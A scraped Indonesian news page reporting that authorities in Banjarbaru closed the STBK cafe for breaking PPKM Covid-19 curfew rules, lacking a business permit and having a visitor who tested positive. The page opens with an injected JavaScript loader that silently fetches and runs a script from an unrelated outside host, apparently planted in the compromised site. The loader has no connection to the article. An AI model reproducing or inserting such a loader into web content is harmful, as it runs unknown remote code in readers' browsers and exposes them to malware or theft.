(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Langgar Aturan PPKM dan Pengunjung Terpapar Covid-19, Kafe STBK di Banjarbaru Ditutup!


KANALKALIMANTAN.COM, BANJARBARU – Dilaksanakannya giat razia pada Jumat (27/3/2021) malam, membuktikan masih banyak masyarakat maupun pelaku usaha melanggar Pemberlakuan Pembatasan Kegiatan Masyarakat (PPKM) Mikro di Kota Banjarbaru.

Patroli malam ini bahkan menemukan adanya masyarakat yang dinyatakan terkonfirmasi Covid-19. Hal itu saat aparat gabungan menyidak salah satu kafe yang masih beroperasional melebih pukul 21.00 Wita, dimana hal tersebut telah melanggar kebijakan PPKM.

“Jadi awalnya kita mendatangi kafe ini, karena masih buka di atas jam operasional yang kita tentukan. Karena melanggar aturan, maka dilakukan swab antigen terhadap para pengunjung dan ternyata ada satu orang dinyatakan positif Covid-19,” Wali Kota Banjarbaru, Aditya Mufti Ariffin.

Temuan adanya pengunjung yang terpapar virus corona ini, begitu disesalkan Wali Kota Banjarbaru. Apalagi yang bersangkutan rupanya juga bukan warga yang tinggal di Banjarbaru.

 

“Yang bersangkutan ini bukan warga Banjarbaru, melainkan warga Kabupaten tetangga. Dia sudah kita minta segera menindaklanjuti kondisinya itu ke daerah tempat tinggalnya atau bisa lapor ke Satgas Covid-19,” tutur Aditya.

Baca juga: Warung Remang di Liang Anggang Langgar Aturan PPKM, Pria dan Wanita Jalani Rapid Antigen!

Imbas perihal temuan ini, Pemerintah Kota (Pemko) Banjarbaru akhirnya memutuskan menutup kafe bernama STBK itu yang lokasinya tepat berada di depan kantor Dinas Kesehatan (Dinkes) Banjarbaru.

Dilakukannya penutupan kata Aditya, juga karena pemilik kafe belum mengatongi surat izin usaha. Ia mengatakan selama ditutup, pemilik kafe harus lebih dulu mengurus izin usahanya dan diwajibkan melakukan sterilisasi di seluruh ruangan.

“Pertama karena tidak memiliki izin usaha. Kedua, melanggar waktu operasional selama PPKM dan ditambah lahu adanya pengunjung yang positif terpapar virus. Kita akan tutup kafe ini sembari menunggu pemiliknya mengurus izin, termasuk mensterilkan tempat. Jika tidak diurus izin, kami tutup selamanya,” tegasnya.

Baca juga: Mudik Lebaran Tahun Ini Resmi Dilarang Pemerintah

Sementara itu, Kapolres Banjarbaru, AKBP Doni Hadi Santoso, menegaskan bahwa pihaknya bersama Pemko, serta seluruh unsur Forum Komunikasi Pimpinan Daerah (Forkopimda) tak akan bosan untuk menegakan aturan PPKM ini demi misi mengendalikan wabah pandemi Covid-19.

“Malam ini kita berhenti di tempat-tempat yang tidak mematuhi aturan PPKM dan melanggar protokol kesehatan. Kegiatan ini akan kita lakukan terus menerus hingga masyarakat sadar,” tegasnya. (Kanalkalimantan.com/rico)

Foto: rico
Editor: cell


Al Ghifari

Recent Posts

TPK Kelurahan Selat Hilir Juara 3 Terbaik Nasional 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Kerja keras yang berbuah manis. Ungkapan tersebut tepat disematkan untuk Tim… Read More

6 menit ago

Ibadah dan Sosial Ekonomi Berkembang, Masjid At-Taqwa Karang Anyar III Diperluas

KANALKALIMANTAN.COM, BANJARBARU - Dalam beberapa tahun terakhir, antusias warga dalam melaksanakan peribadatan di Masjid At… Read More

2 jam ago

Amuntai Expo dan Bazar Ekonomi Kreatif 2024

KANALKALIMANTAN.COM, AMUNTAI - Memeriahkan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) digelar Amuntai Expo… Read More

12 jam ago

Warga Muhammadiyah Banjarbaru Berhalalbihalal di Masjid At Taqwa

KANALKALIMANTAN.COM, BANJARBARU - Pimpinan Cabang Muhammadiyah Banjarbaru Utara menggelar halalbihalal sekaligus Hari Bermuhammadiyah kali pertama… Read More

15 jam ago

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

21 jam ago

Syamsudin Noor Jadi Bandara Domestik, Begini Respon Wali Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pencopotan status internasional pada Bandara Syamsudin Noor Banjarmasin yang terletak di Kota… Read More

21 jam ago

This website uses cookies.